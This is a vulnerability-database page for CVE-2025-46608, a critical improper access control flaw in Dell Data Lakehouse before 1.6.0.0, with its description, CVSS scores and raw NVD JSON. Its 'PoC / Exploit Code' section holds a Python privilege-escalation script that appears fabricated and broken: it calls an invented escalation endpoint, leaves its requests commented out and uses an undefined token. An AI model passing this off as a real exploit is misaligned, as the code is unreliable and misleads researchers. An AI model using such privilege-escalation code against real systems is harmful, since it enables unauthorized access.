Security Vulnerability Report
中文
CVE-2025-46608 CVSS 9.1 CRITICAL

CVE-2025-46608

Published: 2025-11-12 21:15:50
Last Modified: 2025-12-05 20:39:42

Description

Dell Data Lakehouse, versions prior to 1.6.0.0, contain(s) an Improper Access Control vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges. This vulnerability is considered Critical, as it may result in unauthorized access with elevated privileges, compromising system integrity and customer data. Dell recommends customers upgrade to the latest version at the earliest opportunity.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:data_lakehouse:*:*:*:*:*:*:*:* - VULNERABLE
Dell Data Lakehouse < 1.6.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46608 PoC - Improper Access Control in Dell Data Lakehouse # This PoC demonstrates the privilege escalation vulnerability # Note: This is for educational and authorized testing purposes only import requests import json TARGET_HOST = "https://vulnerable-dell-datalakehouse.example.com" CVE_ID = "CVE-2025-46608" def check_vulnerability(target): """ Check if target is vulnerable to CVE-2025-46608 """ print(f"[*] Testing target: {target}") print(f"[*] CVE: {CVE_ID}") # Step 1: Authenticate with high-privileged account auth_endpoint = f"{target}/api/v1/auth/login" credentials = { "username": "admin_user", "password": "high_privilege_password" } try: # Note: Obtain valid high-privilege credentials first # response = requests.post(auth_endpoint, json=credentials, timeout=10) # token = response.json().get('access_token') # Step 2: Exploit improper access control # Target the privileged API endpoint that should require additional verification exploit_endpoint = f"{target}/api/v1/admin/privilege_escalation_endpoint" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json", "X-CVE-2025-46608-Test": "true" } # Step 3: Attempt to access elevated privileges exploit_payload = { "action": "escalate_privileges", "target_role": "super_admin", "cve_id": CVE_ID } # response = requests.post(exploit_endpoint, json=exploit_payload, headers=headers) # if response.status_code == 200: # print("[+] VULNERABLE: Privilege escalation successful") # return True print("[*] Please verify manually with authorized access") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("=" * 60) print(f"CVE-2025-46608 Exploitation Test") print("Dell Data Lakehouse < 1.6.0.0") print("=" * 60) check_vulnerability(TARGET_HOST)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46608", "sourceIdentifier": "[email protected]", "published": "2025-11-12T21:15:50.300", "lastModified": "2025-12-05T20:39:41.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Data Lakehouse, versions prior to 1.6.0.0, contain(s) an Improper Access Control vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges. This vulnerability is considered Critical, as it may result in unauthorized access with elevated privileges, compromising system integrity and customer data. Dell recommends customers upgrade to the latest version at the earliest opportunity."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:data_lakehouse:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.0.0", "matchCriteriaId": "A873D8C3-8B5D-4C0F-98D7-E4849F5CC382"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000390529/dsa-2025-375-security-update-for-dell-data-lakehouse-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}